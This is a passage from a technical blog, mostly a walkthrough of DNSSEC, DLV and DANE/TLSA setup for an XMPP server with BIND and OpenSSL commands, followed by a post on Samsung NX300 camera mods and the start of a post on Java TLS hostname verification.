The record syntax is: priority (5), weight (1), port (5222 for clients, 5269 for servers) and host (xmpp.yaxim.org). Priority and weight are used for load-balancing multiple servers, which we are not using.
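
To double-check the records from a client's perspective, a short lookup helps; a sketch using the dnspython library (assuming dnspython 2.0+ for resolve()):

import dns.resolver

# query the client SRV record for the XMPP service domain
for srv in dns.resolver.resolve("_xmpp-client._tcp.yax.im", "SRV"):
    print(srv.priority, srv.weight, srv.port, srv.target)
# expected: 5 1 5222 xmpp.yaxim.org.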

Attention: some clients (or their respective DNS resolvers, often hidden in outdated, cheap, plastic junk routers provided by your "broadband" ISP) fail to resolve SRV records and thus fall back to the A record. If you set up a new XMPP server, you will slightly improve your availability by ensuring that the A record (yax.im in our case) points to the XMPP server as well. However, DNSSEC will be even more of a challenge for them, so let's write them off for now.

Obtaining a TLS Certificate for XMPP

While DANE allows rolling out self-signed certificates, our goal is to stay compatible with clients and servers that do not deploy DNSSEC yet. Therefore, we need a certificate issued by a trustworthy member of the Certificate Extortion ring. Currently, StartSSL and WoSign offer free certificates, and Let's Encrypt is about to launch.

Both StartSSL and WoSign offer a convenient function to generate your keypair. DO NOT USE THAT! Create your own keypair! This "feature" will allow the CA to decrypt your traffic (unless all your clients deploy PFS, which they don't) and only makes sense if the CA is operated by an Intelligence Agency.

What You Ask For...

The certificate we are about to obtain must be somehow tied to our XMPP service. We have three different names (yax.im, chat.yax.im and xmpp.yaxim.org), and the obvious question is: which one should be entered into the certificate request?

Fortunately, this is easy to find out, as it is well-defined in the XMPP Core specification, section 13.7:

In a PKIX certificate to be presented by an XMPP server (i.e., a "server certificate"), the certificate SHOULD include one or more XMPP addresses (i.e., domainparts) associated with XMPP services hosted at the server. The rules and guidelines defined in [TLS‑CERTS] apply to XMPP server certificates, with the following XMPP-specific considerations:

  • Support for the DNS-ID identifier type [PKIX] is REQUIRED in XMPP client and server software implementations. Certification authorities that issue XMPP-specific certificates MUST support the DNS-ID identifier type. XMPP service providers SHOULD include the DNS-ID identifier type in certificate requests.

  • Support for the SRV-ID identifier type [PKIX‑SRV] is REQUIRED for XMPP client and server software implementations (for verification purposes XMPP client implementations need to support only the "_xmpp-client" service type, whereas XMPP server implementations need to support both the "_xmpp-client" and "_xmpp-server" service types). Certification authorities that issue XMPP-specific certificates SHOULD support the SRV-ID identifier type. XMPP service providers SHOULD include the SRV-ID identifier type in certificate requests.

  • [...]

Translated into English, our certificate SHOULD contain yax.im and chat.yax.im according to [TLS-CERTS], which is "Representation and Verification of Domain-Based Application Service Identity within Internet Public Key Infrastructure Using X.509 (PKIX) Certificates in the Context of Transport Layer Security (TLS)", or for short RFC 6125. There, section 2.1 defines that there is the CN-ID (Common Name, which used to be the only entry identifying a certificate), one or more DNS-IDs (baseline entries usable for any services) and one or more SRV-IDs (service-specific entries, e.g. for XMPP). DNS-IDs and SRV-IDs are stored in the certificate as subject alternative names (SAN).

Following the above XMPP Core quote, a CA must support adding a DNS-ID and should support adding an SRV-ID field to the certificate. Clients and servers must support both field types. The SRV-ID is constructed according to RFC 4985, section 2, where it is called SRVName:

The SRVName, if present, MUST contain a service name and a domain name in the following form:

_Service.Name

For our XMPP scenario, we would need three SRV-IDs (_xmpp-client.yax.im for clients, _xmpp-server.yax.im for servers, and _xmpp-server.chat.yax.im for the conference service; all without the _tcp. part we had in the SRV record). In addition, the two DNS-IDs yax.im and chat.yax.im are recommended by the specification, allowing the certificate to be (ab)used for HTTPS as well.

Update: The quoted specifications allow creating an XMPP-only certificate based on SRV-IDs that contains no DNS-IDs (and has a non-hostname CN). Such a certificate could be used to delegate XMPP operations to a third party, or to limit the impact of leaked private keys. However, you will have a hard time convincing a public CA to issue one, and once you get it, it will be refused by most clients due to lack of SRV-ID implementation.

And then there is one more thing. RFC 7673 proposes also checking the certificate for the SRV destination (xmpp.yaxim.org in our case) if the SRV record was properly validated, there is no associated TLSA record, and the application user was born under the Virgo zodiac sign.

Summarizing the different possible entries in our certificate, we get the following picture:

Name(s)                                   Field Type        Meaning
yax.im or chat.yax.im                     Common Name (CN)  Legacy name for really old clients and servers.
yax.im, chat.yax.im                       DNS-IDs (SAN)     Required entries telling us that the host serves anything on the two domain names.
_xmpp-client.yax.im, _xmpp-server.yax.im  SRV-IDs (SAN)     Optional entries telling us that the host serves XMPP to clients and servers.
_xmpp-server.chat.yax.im                  SRV-ID (SAN)      Optional entry telling us that the host serves XMPP to servers for chat.yax.im.
xmpp.yaxim.org                            DNS-ID or CN      Optional entry if you can configure a DNSSEC-signed SRV record but not a TLSA record.

...and What You Actually Get

Most CAs have no way to define special field types. You provide a list of service/host names, the first one is set as the CN, and all of them are stored as DNS-ID SANs. However, StartSSL offers "XMPP Certificates", which look like they might do what we want above. Let's request one from them for yax.im and chat.yax.im and see what we got:

openssl x509 -noout -text -in yaxim.crt
[...]
Subject: description=mjp74P5w0cpIUITY, C=DE, CN=chat.yax.im/emailAddress=hostmaster@yax.im
X509v3 Subject Alternative Name:
    DNS:chat.yax.im, DNS:yax.im, othername:<unsupported>,
    othername:<unsupported>, othername:<unsupported>, othername:<unsupported>

So it's othername:<unsupported>, then? Thank you OpenSSL, for your openness! From RFC 4985 we know that "othername" is the basic type of the SRV-ID SAN, so it looks like we got something more or less correct. Using this script (highlighted source, thanks Zash), we can further analyze what we've got:

Extensions:
  X509v3 Subject Alternative Name:
    sRVName: chat.yax.im, yax.im
    xmppAddr: chat.yax.im, yax.im
    dNSName: chat.yax.im, yax.im

Alright, the two service names we submitted turned out under three different field types:

  • SRV-ID (it's missing the _xmpp-client. / _xmpp-server. part and is thus invalid)
  • xmppAddr (this was the correct entry type in the deprecated RFC 3920 XMPP specification, but is now only allowed in client certificates)
  • DNS-ID (wow, these ones happen to be correct!)

While this is not quite what we wanted, it is sufficient to allow a correctly implemented client to connect to our server, without raising certificate errors.
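
Incidentally, the same analysis can be repeated without Lua; a sketch using the Python cryptography package (assuming version 3.1+), which enumerates the SAN entries and matches the OtherName OIDs from RFC 4985 (SRVName) and RFC 3920 (xmppAddr):

from cryptography import x509
from cryptography.x509.oid import ExtensionOID

ID_ON_DNSSRV = x509.ObjectIdentifier("1.3.6.1.5.5.7.8.7")    # sRVName
ID_ON_XMPPADDR = x509.ObjectIdentifier("1.3.6.1.5.5.7.8.5")  # xmppAddr

with open("yaxim.crt", "rb") as f:
    cert = x509.load_pem_x509_certificate(f.read())

san = cert.extensions.get_extension_for_oid(
    ExtensionOID.SUBJECT_ALTERNATIVE_NAME).value
print("dNSName:", san.get_values_for_type(x509.DNSName))
for other in san.get_values_for_type(x509.OtherName):
    kind = {ID_ON_DNSSRV: "sRVName",
            ID_ON_XMPPADDR: "xmppAddr"}.get(other.type_id, "unknown")
    # other.value holds the DER-encoded ASN.1 string
    print(kind, other.value)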

Configuring DNSSEC for Your Domain(s)

In the next step, the domain (in our case both yax.im and yaxim.org, but the following examples will only list yax.im) needs to be signed with DNSSEC. Because I'm a lazy guy, I'm using BIND 9.9, which does inline-signing (all I need to do is create some keys and enable the feature).

Key Creation with BIND 9.9

For each domain, a zone signing key (ZSK) is needed to sign the individual records. Furthermore, a key signing key (KSK) should be created to sign the ZSK. This allows you to rotate the ZSK as often as you wish.

# create key directory
mkdir /etc/bind/keys
cd /etc/bind/keys
# create key signing key
dnssec-keygen -f KSK -3 -a RSASHA256 -b 2048 yax.im
# create zone signing key
dnssec-keygen -3 -a RSASHA256 -b 2048 yax.im
# make all keys readable by BIND
chown -R bind.bind .

To enable it, you need to configure the key directory, inline signing and automatic re-signing:

zone "yax.im" {
    ...
    key-directory "/etc/bind/keys";
    inline-signing yes;
    auto-dnssec maintain;
};

After reloading the config, the keys need to be enabled in BIND:

# load keys and check if they are enabled
$ rndc loadkeys yax.im
$ rndc signing -list yax.im
Done signing with key 17389/RSASHA256
Done signing with key 24870/RSASHA256

The above steps need to be performed for yaxim.org as well.

NSEC3 Against Zone Walking

Finally, we also want to enable NSEC3 to prevent curious people from "walking the zone", i.e. retrieving a full list of all host names under our domains. To accomplish that, we need to specify some parameters for hashing names. These parameters will be published in an NSEC3PARAMS record, which resolvers can use to apply the same hashing mechanism as we do.

First, the hash function to be used. RFC 5155, section 4.1 tells us that...

"The acceptable values are the same as the corresponding field in the NSEC3 RR."

NSEC3 is also defined in RFC 5155, albeit in section 3.1.1. There, we learn that...

"The values for this field are defined in the NSEC3 hash algorithm registry defined in Section 11."

It's right there... at the end of the section:

Finally, this document creates a new IANA registry for NSEC3 hash algorithms. This registry is named "DNSSEC NSEC3 Hash Algorithms". The initial contents of this registry are:

0 is Reserved.

1 is SHA-1.

2-255 Available for assignment.

Let's pick 1 from this plethora of choices, then.

The second parameter is "Flags", which is also defined in Section 11, and must be 0 for now (other values have to be defined yet).

The third parameter is the number of iterations for the hash function. For a 2048-bit key, it MUST NOT exceed 500. BIND defaults to 10, Strotman references 330 from RFC 4641bis, but it seems that number has been removed since then. We take that number anyway.

The last parameter is a salt for the hash function (a random hexadecimal string; we use 8 bytes). You should not copy the value from another domain, to prevent rainbow-table attacks, but there is no need to make it very secret.

$ rndc signing -nsec3param 1 0 330 $(head -c 8 /dev/random|hexdump -e '"%02x"') yaxim.org
$ rndc signing -nsec3param 1 0 330 $(head -c 8 /dev/random|hexdump -e '"%02x"') yax.im

Whenever you update the NSEC3PARAM value, your zone will be re-signed and re-published. That means you can change the iteration count and salt value later on, if the need should arise.
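
If you are curious what resolvers actually compute from these parameters, the hashing is easy to reproduce; a sketch following RFC 5155, section 5 (base64.b32hexencode needs Python 3.10+):

import base64
import hashlib

def nsec3_hash(name, salt_hex, iterations):
    # owner name in DNS wire format: lowercase, length-prefixed labels
    wire = b"".join(
        bytes([len(label)]) + label.encode()
        for label in name.lower().rstrip(".").split(".")
    ) + b"\x00"
    salt = bytes.fromhex(salt_hex)
    # RFC 5155: IH(salt, x, 0) = H(x || salt), then iterate H(h || salt)
    digest = hashlib.sha1(wire + salt).digest()
    for _ in range(iterations):
        digest = hashlib.sha1(digest + salt).digest()
    # NSEC3 owner names are base32 with the "extended hex" alphabet
    return base64.b32hexencode(digest).decode().lower()

# example with a made-up salt; use the values from your NSEC3PARAM
print(nsec3_hash("yax.im", "0123456789abcdef", 330))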

Configuring the DS (Delegation Signer) Record for yaxim.org

If your domain is on an already-signed TLD (like yaxim.org on .org), you need to establish a trust link from the .org zone to your domain's signature keys (the KSK, to be precise). For this purpose, the delegation signer (DS) record type has been created.

A DS record is a signed record in the parent domain (.org) that identifies a valid key for a given sub-domain (yaxim.org). Multiple DS records can coexist to allow key rollover. If you are running an important service, you should create a second KSK, store it in a safe place, and add its DS in addition to the currently used one. Should your primary name server go up in flames, you can recover without waiting for the domain registrar to update your records.

Exporting the DS Record

To obtain the DS record, BIND comes with the dnssec-dsfromkey tool. Just pipe all your keys into it, and it will output DS records for the KSKs. We do not want SHA-1 records any more, so we pass -2 as well to get the SHA-256 record:

$ dig @127.0.0.1 DNSKEY yaxim.org | dnssec-dsfromkey -f - -2 yaxim.org
yaxim.org. IN DS 42199 8 2 35E4E171FC21C6637A39EBAF0B2E6C0A3FE92E3D2C983281649D9F4AE3A42533

This line is what you need to submit to your domain registrar (using their web interface or by means of a support ticket). The information contained is:

  • key tag: 42199 (this is just a numeric ID for the key, useful for key rollovers)
  • signature algorithm: 8 (RSA / SHA-256)
  • DS digest type: 2 (SHA-256)
  • hash value: 35E4E171...E3A42533
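
The digest itself is no magic: SHA-256 over the owner name (in DNS wire format) concatenated with the DNSKEY RDATA, with the key tag computed as in RFC 4034, Appendix B. A minimal sketch:

import base64
import hashlib
import struct

def wire_name(name):
    # owner name in DNS wire format: lowercase, length-prefixed labels
    return b"".join(
        bytes([len(l)]) + l.encode()
        for l in name.lower().rstrip(".").split(".")
    ) + b"\x00"

def ds_record(owner, flags, protocol, algorithm, pubkey_b64):
    rdata = struct.pack("!HBB", flags, protocol, algorithm) \
        + base64.b64decode(pubkey_b64)
    # key tag: the 16-bit checksum from RFC 4034, Appendix B
    tag = 0
    for i, byte in enumerate(rdata):
        tag += byte if i & 1 else byte << 8
    tag = (tag + (tag >> 16)) & 0xFFFF
    digest = hashlib.sha256(wire_name(owner) + rdata).hexdigest().upper()
    return f"{owner} IN DS {tag} {algorithm} 2 {digest}"

# e.g. with the flags (257), protocol (3), algorithm (8) and key data
# of the KSK shown below:
# print(ds_record("yaxim.org.", 257, 3, 8, "AwEAAcDCzsLh..."))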

However, some registrars insist on creating the DS record themselves, and require you to send in your DNSKEY. We only need to give them the KSK (type 257), so we filter the output accordingly:

$ dig @127.0.0.1 DNSKEY yaxim.org | grep 257
yaxim.org.              86400   IN      DNSKEY  257 3 8
    AwEAAcDCzsLhZT849AaG6gbFzFidUyudYyq6NHHbScMl+PPfudz5pCBt
    G2AnDoqaW88TiI9c92x5f+u9Yx0fCiHYveN8XE2ed/IQB3nBW9VHiGQC
    CliM0yDxCPyuffSN6uJNVHPEtpbI4Kk+DTcweTI/+mtTD+sC+w/CST/V
    NFc5hV805bJiZy26iJtchuA9Bx9GzB2gkrdWFKxbjwKLF+er2Yr5wHhS
    Ttmvntyokio+cVgD1UaNKcewnaLS1jDouJ9Gy2OJFAHJoKvOl6zaIJuX
    mthCvmohlsR46Sp371oS79zrXF3LWc2zN67T0fc65uaMPkeIsoYhbsfS
    /aijJhguS/s=

Validation of the Trust Chain

As soon as the record is updated, you can check the trustworthiness of your domain. Unfortunately, all of the available command-line tools suck. One of the least-sucking ones is drill from ldns. It still needs a root.key file that contains the officially trusted DNSSEC key for the . (root) domain. In Debian, the dns-root-data package places it under /usr/share/dns/root.key. Let's drill our domain name with DNSSEC (-D), tracing from the root zone (-T), quietly (-Q):

$ drill -DTQ -k /usr/share/dns/root.key yaxim.org
;; Number of trusted keys: 1
;; Domain: .
[T] . 172800 IN DNSKEY 256 3 8 ;{id = 48613 (zsk), size = 1024b}
. 172800 IN DNSKEY 257 3 8 ;{id = 19036 (ksk), size = 2048b}
[T] org. 86400 IN DS 21366 7 1 e6c1716cfb6bdc84e84ce1ab5510dac69173b5b2 
org. 86400 IN DS 21366 7 2 96eeb2ffd9b00cd4694e78278b5efdab0a80446567b69f634da078f0d90f01ba 
;; Domain: org.
[T] org. 900 IN DNSKEY 257 3 7 ;{id = 9795 (ksk), size = 2048b}
org. 900 IN DNSKEY 256 3 7 ;{id = 56198 (zsk), size = 1024b}
org. 900 IN DNSKEY 256 3 7 ;{id = 34023 (zsk), size = 1024b}
org. 900 IN DNSKEY 257 3 7 ;{id = 21366 (ksk), size = 2048b}
[T] yaxim.org. 86400 IN DS 42199 8 2 35e4e171fc21c6637a39ebaf0b2e6c0a3fe92e3d2c983281649d9f4ae3a42533 
;; Domain: yaxim.org.
[T] yaxim.org. 86400 IN DNSKEY 257 3 8 ;{id = 42199 (ksk), size = 2048b}
yaxim.org. 86400 IN DNSKEY 256 3 8 ;{id = 6384 (zsk), size = 2048b}
[T] yaxim.org.  3600    IN  A   83.223.75.29
;;[S] self sig OK; [B] bogus; [T] trusted

The above output traces from the initially trusted . key to org, then to yaxim.org and determines that yaxim.org is properly DNSSEC-signed and therefore trusted ([T]). This is already a big step, but the tool lacks some color, and it does not allow to explicitly query the domain's name servers (unless they are open resolvers), so you can't test your config prior to going live.

To get a better view of our DNSSEC situation, we can query some online services, like DNSViz, Verisign's DNSSEC debugger, or Lutz' livetest.

Ironically, neither DNSViz nor Verisign support encrypted connections via HTTPS, and Lutz' livetest is using an untrusted root.

Enabling DNSSEC Look-aside Validation for yax.im

Unfortunately, we can not do the same with our short and shiny yax.im domain. If we try to drill it, we get the following:

$ drill -DTQ -k /usr/share/dns/root.key yax.im
;; Number of trusted keys: 1
;; Domain: .
[T] . 172800 IN DNSKEY 256 3 8 ;{id = 48613 (zsk), size = 1024b}
. 172800 IN DNSKEY 257 3 8 ;{id = 19036 (ksk), size = 2048b}
[T] Existence denied: im. DS
;; Domain: im.
;; No DNSKEY record found for im.
;; No DS for yax.im.
;; Domain: yax.im.
[S] yax.im. 86400 IN DNSKEY 257 3 8 ;{id = 17389 (ksk), size = 2048b}
yax.im. 86400 IN DNSKEY 256 3 8 ;{id = 24870 (zsk), size = 2048b}
[S] yax.im. 3600    IN  A   83.223.75.29
;;[S] self sig OK; [B] bogus; [T] trusted

There are two pieces of relevant information here:

  • [T] Existence denied: im. DS - the top-level zone assures that .IM is not DNSSEC-signed (it has no DS record).
  • [S] yax.im. 3600 IN A 83.223.75.29 - yax.im is self-signed, providing no way to check its authenticity.

The .IM top-level domain for Isle of Man is operated by Domicilium. A friendly support request reveals the following:

Unfortunately there is no ETA for DNSSEC support at this time.

That means there is no way to create a chain of trust from the root zone to yax.im.

Fortunately, the designers of DNSSEC anticipated this problem. To accelerate the adoption of DNSSEC by second-level domains, the concept of look-aside validation was introduced in 2006. It allows using an alternative trust root when hierarchical chaining is not possible. The ISC is even operating such an alternative trust root. All we need to do is register our domain with them, and add them to our resolvers (because they are not added by default).

After registering with DLV, we are asked to add our domain with its respective KSK domain key entry. To prove domain and key ownership, we must further create a signed TXT record under dlv.yax.im with a specific value:

dlv.yax.im. IN TXT "DLV:1:fcvnnskwirut"

Afterwards, we request DLV to check our domain. It queries all of the domain's DNS servers for the relevant information and compares the results. Unfortunately, our domain fails the check:

FAILURE 69.36.225.255 has extra: yax.im. 86400 IN DNSKEY 256 3 RSASHA256 ( AwEAAepYQ66j42jjNHN50gUldFSZEfShF...
FAILURE 69.36.225.255 has extra: yax.im. 86400 IN DNSKEY 257 3 RSASHA256 ( AwEAAcB7Fx3T/byAWrKVzmivuH1bpP5Jx...
FAILURE 69.36.225.255 missing: YAX.IM. 86400 IN DNSKEY 256 3 RSASHA256 ( AwEAAepYQ66j42jjNHN50gUldFSZEfShF...
FAILURE 69.36.225.255 missing: YAX.IM. 86400 IN DNSKEY 257 3 RSASHA256 ( AwEAAcB7Fx3T/byAWrKVzmivuH1bpP5Jx...
FAILURE This means your DNS servers are out of sync. Either wait until the DNSKEY data is the same, or fix your server's contents.

This looks like a combination of two different issues:

  1. Some of our name servers return YAX.IM when asked for yax.im.
  2. The DLV check script is case-sensitive when comparing domain names.

Problem #1 is officially not a problem. DNS is case-insensitive, and therefore all clients that fail to accept YAX.IM answers to yax.im requests are broken. In practice, this hits not only the DLV resolver (problem #2), but also the resolver code in Erlang, which is used in the widely-deployed ejabberd XMPP server.

While we can't fix all the broken servers out there, #2 has been reported and fixed, and hopefully the fix has been rolled out to production already. Still, issue #1 needs to be solved.

It turns out that it is caused by case-insensitive response compression. You can't make this stuff up! Fortunately, BIND 9.9.6 added the no-case-compress ACL, so "all you need to do" is to upgrade BIND and enable that shiny new feature.
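
With a new enough BIND, enabling it is a one-line change in named.conf (a sketch; widen or narrow the address match list as needed):

options {
    // always use case-sensitive name compression in responses,
    // so the case of the query name is preserved for all clients
    no-case-compress { any; };
};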

After checking and re-checking the dlv.yax.im TXT record with DLV, there is finally progress:

SUCCESS DNSKEY signatures validated.
...
SUCCESS COOKIE: Good signature on TXT response from <NS IP>
SUCCESS <NS IP> has authentication cookie DLV:1:fcvnnskwirut
...
FINAL_SUCCESS Success.

After your domain got validated, it will receive its look-aside validation records under dlv.isc.org:

$ dig +noall +answer DLV yax.im.dlv.isc.org
yax.im.dlv.isc.org. 3451    IN  DLV 17389 8 2 C41AFEB57D71C5DB157BBA5CB7212807AB2CEE562356E9F4EF4EACC2 C4E69578
yax.im.dlv.isc.org. 3451    IN  DLV 17389 8 1 8BA3751D202EF8EE9CE2005FAF159031C5CAB68A

This looks like a real success. Except that nobody is using DLV in their resolvers by default, and DLV will stop operations in 2017.

Until then, you can enable look-aside validation in your BIND and Unbound resolvers.
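
What that looks like depends on the resolver; the following is a sketch for both, where the Unbound anchor file path is an assumption of this example:

// BIND (named.conf, options section); uses the built-in dlv.isc.org anchor:
dnssec-lookaside auto;

# Unbound (unbound.conf):
server:
    dlv-anchor-file: "/etc/unbound/dlv.isc.org.key"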

Lutz' livetest service also supports checking DLV-backed domains, so we can verify our configuration there.

Creating TLSA Records for HTTP and SRV

Now that we have created keys, signed our zones, and established trust in them from the root (more or less), we can put more sensitive information into DNS, and our users can verify that it was actually added by us (or by one of at most two or three governments: the US, the TLD holder, and the country hosting your name servers).

This allows us to add a second, independent, trust root to the TLS certificates we use for our web server (yaxim.org) as well as for our XMPP server, by means of TLSA records.

These record types are defined in RFC 6698 and consist of the following pieces of information:

  • domain name (i.e. www.yaxim.org)
  • certificate usage (is it a CA or a server certificate, is it signed by a "trusted" Root CA?)
  • selector + matching type + certificate association data (the actual certificate reference, encoded in one of multiple possible forms)

Domain Name

The domain name is the hostname in the case of HTTPS, but it's slightly more complicated for the XMPP SRV record, because there we have the service domain (yax.im), the conference domain (chat.yax.im) and the actual server domain name (xmpp.yaxim.org).

The behavior for SRV TLSA handling is defined in RFC 7673, published as a Proposed Standard in October 2015. First, the client must validate that the SRV response for the service domain is properly DNSSEC-signed. Only then can the client trust that the server named in the SRV record is actually responsible for the service.

In the next step, the client must ensure that the address response (A for IPv4 and AAAA for IPv6) is DNSSEC-signed as well, or fall back to the next SRV record.

If both the SRV and the A/AAAA records are properly signed, the client must do a TLSA lookup for the SRV target (which is _5222._tcp.xmpp.yaxim.org for our client users, or _5269._tcp.xmpp.yaxim.org for other XMPP servers connecting to us).
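
For our setup, the first step of that chain can be followed by hand; the lookup below determines the SRV target that the TLSA query must then be made for (illustrative output; priority and weight may differ):

$ dig +short SRV _xmpp-client._tcp.yax.im
0 0 5222 xmpp.yaxim.org.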

Certificate Usage

The certificate usage field can take one of four possible values (0 through 3). Translated into English, the possibilities are:

  • (0) "trusted" CA - the provided cert is a CA cert that is trusted by the client, and the server certificate must be signed by this CA. We could use this to indicate that our server will only use StartSSL-issued certificates.
  • (1) "trusted" server certificate - the provided cert corresponds to the certificate returned over TLS and must be signed by a trusted Root CA. We will use this to deliver our server certificate.
  • (2) "untrusted" CA - the provided CA certificate must be the one used to sign the server's certificate. We could roll out a private CA and use this type, but it would cause issues with non-DNSSEC clients.
  • (3) "untrusted" server certificate - the provided certificate must be the same as returned by the server, and no Root CA trust checks shall be performed.

The Actual Certificate Association

Now that we know the server name for which the certificate is valid and the type of certificate and trust checks to perform, we need to store the actual certificate reference. Three fields are used to encode the certificate reference.

The selector defines whether the full certificate (0) or only the SubjectPublicKeyInfo field (1) is referenced. The latter allows getting the server key re-signed by a different CA without changing the TLSA records. The former could theoretically be used to put the full certificate into DNS (a rather bad idea for TLS, but possibly interesting for S/MIME certs).

The matching type field defines how the "selected" data (certificate or SubjectPublicKeyInfo) is stored:

  • (0) exact match of the whole "selected" data
  • (1) SHA-256 hash of the "selected" data
  • (2) SHA-512 hash of the "selected" data

Finally, the certificate association data is the certificate/SubjectPublicKeyInfo data or hash, as described by the previous fields.
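
For illustration, if we went with selector 1 (SubjectPublicKeyInfo) and matching type 1 (SHA-256) instead, the association data could be derived with a pipeline along these lines (a sketch, using the certificate file from the next section):

$ openssl x509 -in yaxim.org-2014.crt -pubkey -noout | \
      openssl pkey -pubin -outform DER | openssl sha256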

Putting it all Together

A good configuration for our service is a record based on a CA-issued server certificate (certificate usage 1), with the full certificate (selector 0) hashed via SHA-256 (matching type 1). We can obtain the required association data using OpenSSL command line tools:

openssl x509 -in yaxim.org-2014.crt -outform DER | openssl sha256
(stdin)= bbcc3ca09abfc28beb4288c41f4703a74a8f375a6621b55712600335257b09a9

Taken together, this results in the following entries for HTTPS on yaxim.org and www.yaxim.org:

_443._tcp.yaxim.org     IN TLSA 1 0 1 bbcc3ca09abfc28beb4288c41f4703a74a8f375a6621b55712600335257b09a9
_443._tcp.www.yaxim.org IN TLSA 1 0 1 bbcc3ca09abfc28beb4288c41f4703a74a8f375a6621b55712600335257b09a9

This is also the SHA-256 fingerprint you can see in your web browser.
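
The same fingerprint can be cross-checked against the live server from the command line (a sketch; the fingerprint shown is the hash from above in its colon-separated form):

$ openssl s_client -connect www.yaxim.org:443 </dev/null 2>/dev/null | \
      openssl x509 -noout -fingerprint -sha256
SHA256 Fingerprint=BB:CC:3C:A0:9A:BF:C2:8B:EB:42:88:C4:1F:47:03:A7:4A:8F:37:5A:66:21:B5:57:12:60:03:35:25:7B:09:A9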

For the XMPP part, we need to add TLSA records for the SRV targets (_5222._tcp.xmpp.yaxim.org for clients and _5269._tcp.xmpp.yaxim.org for servers). There should be no need for TLSA records on the service domain (_5222._tcp.yax.im): a modern client will always try to resolve the SRV records first, and if that lookup fails, no DNSSEC validation is possible anyway.

Here, we take the SHA-256 sum of the yax.im certificate we obtained from StartSSL, and create two records with the same type and format as above:

_5222._tcp.xmpp.yaxim.org IN TLSA 1 0 1 cef7f6418b7d6c8e71a2413f302f92fc97e57ec18b36f97a4493964564c84836
_5269._tcp.xmpp.yaxim.org IN TLSA 1 0 1 cef7f6418b7d6c8e71a2413f302f92fc97e57ec18b36f97a4493964564c84836

These fields will be used by DNSSEC-enabled clients to verify the TLS certificate presented by our XMPP service.

Replacing the Server Certificate

Now that the TLSA records are in place, it is not as easy to replace your server certificate as it was before, because the old one is now anchored in DNS.

You need to perform the following steps in order to ensure that all clients will be able to connect at any time:

  1. Obtain the new certificate
  2. Create a second set of TLSA records for the new certificate, keeping the old ones in place (see the example below)
  3. Wait for the configured DNS time-to-live to ensure that all users have received both sets of TLSA records
  4. Replace the old certificate on the server with the new one
  5. Remove the old TLSA records

If you fail to add the new TLSA records and wait out the DNS TTL, some clients will still have cached only the old TLSA records, and they will reject your new server certificate.
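
During step 2, the zone temporarily carries two associations for the same port; the second record below stands in for the new certificate (placeholder hash):

_443._tcp.yaxim.org IN TLSA 1 0 1 bbcc3ca09abfc28beb4288c41f4703a74a8f375a6621b55712600335257b09a9
_443._tcp.yaxim.org IN TLSA 1 0 1 <SHA-256 hash of the new certificate>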

Conclusion

DANE for XMPP is a chicken-and-egg problem. As long as there are no servers, it will not be implemented in the clients, and vice versa. However, the (currently unavailable) xmpp.net XMPP security analyzer checks the DANE validation status, and GSoC 2015 brought us DNSSEC support in minidns, which will soon be leveraged in Smack-based XMPP clients.

With this (rather long) post covering all the steps of a successful DNSSEC implementation, including the special challenges of .IM domains, I hope to pave the way for more XMPP server operators to follow.

Enabling DNSSEC and DANE provides an improvement over the rather broken Root CA trust model; however, it is not without controversy. tptacek makes strong arguments against DNSSEC, because it uses outdated crypto and because it does not completely solve the government-level MitM problem. Unfortunately, his proposal to "do nothing" will not improve the situation, and his only positive contribution ("use TACK!") expired in 2013.

Finally, one last technical issue not covered by this post is periodic key rollover; this will be covered by a separate post eventually.

Comments on HN

Posted 2015-10-16 17:55

This is the third post in a series covering the Samsung NX300 "Smart" Camera. In the first post, we have analyzed how the camera is interacting with the outside world using NFC and WiFi. The second one showed a method to gain a remote root shell, and it spawned a number of interesting projects. This post is a reference collection of these projects, and a call for collaboration.

Samsung NX300 Firmware Update

First, I want to thank Samsung for fixing the most serious security problems in the NX300 firmware. As of firmware version 1.41, the X server is closed down and there is an option to encrypt the WiFi network spawned by the camera with WPA2:

[v1.41]
1. Add Wi-Fi Privacy Lock function
2. Revision Open Source Licenses

Unfortunately, the provided 8-digit PIN can be cracked in less than one hour using pyrit on a mid-range GPU: the keyspace is only 10^8 PINs, so even at an (assumed) rate of roughly 50,000 PMKs per second, an exhaustive search finishes in about half an hour. While this is far from good security, it at least requires some dedication from the attacker.

Even more unfortunately, Samsung removed autoexec.sh execution from the NX300M firmware starting with (or after) 1.11. Dear Samsung engineers, if you are reading this: please add it back! Executing code from the SD card (without modifying the firmware image) is a great opportunity, not a security problem! Most of the mods discussed in this post are leveraging that functionality in a creative way!

Automatic Photo Backups

Markus A. Kuppe has written a tutorial for auto-backups of the NX300 using an ftp client on the camera and a Raspberry Pi ftp server. One interesting bit of information is how to make the camera auto-connect to WiFi whenever it is turned on, using a custom wpa_supplicant.conf and DBus:

# copy the WiFi credentials from the SD card to where the system expects them
cp /mnt/mmc/wpa_supplicant.conf /tmp/
# bring up the WiFi hardware, then start connman and Samsung's net-config
/usr/bin/wlan.sh start NL 0x8210
/usr/sbin/connmand -W nl80211 -r
/usr/sbin/net-config
sleep 2
# ask connman over DBus to connect; the service path encodes the adapter MAC
# (a0219572b25b) and the hex-encoded SSID ("www.lemmster.de")
dbus-send --system --type=method_call --print-reply --dest=net.connman \
    /net/connman/service/wifi_a0219572b25b_7777772e6c656d6d737465722e6465_managed_psk \
    net.connman.Service.Connect

Jonathan Dieter created another backup mechanism using SCP and published the nx300m-autobackup source code. Well done!

Additional Kernel Modules

Markus also provided a short write-up on compiling additional kernel modules, which should allow us to extend the camera's functionality without re-flashing the firmware.

Crypto Photography

The most interesting idea, however, was envisioned by Doug Hickok. He modified the firmware to auto-encrypt photographs using public-key cryptography. This allows for very interesting use cases, like letting a professional photographer take pictures without letting them keep a copy, or letting investigative journalists hide their data tracks.

In the current implementation, the pictures are first stored to the SD card and then encrypted and deleted, which allows for undelete attacks. Do not use it in production yet. With some more tweaking, however, it should be possible to make this firmware actually deliver on its security promise.

Announcement: Samsung NX Hacks

Seeing how there is a (still small) community of tinkerers around the NX300 camera, and knowing that a whole range of Samsung NX cameras comes with Tizen-based firmware (NX1, NX200, NX2000, NX300M, ...?), the author has created a repository and a Wiki on GitHub.

Feel free to contribute to the wiki or the project - every input is welcome, starting from transferring information from the blog posts linked above into a more structured form in the wiki, and up to creating firmware modifications to allow for exciting new features.

Hack on!



Posted 2015-01-29 17:30

Internet security is hard. TLS is almost impossible. Implementing TLS correctly in Java is a nightmare! While the higher-level HttpsURLConnection and Apache's DefaultHttpClient do it (mostly) right, direct users of Java SSL sockets (SSLSocket/SSLEngine, SSLSocketFactory) are left exposed to Man-in-the-Middle attacks, unless the application manually checks the hostname against the certificate or employs certificate pinning.

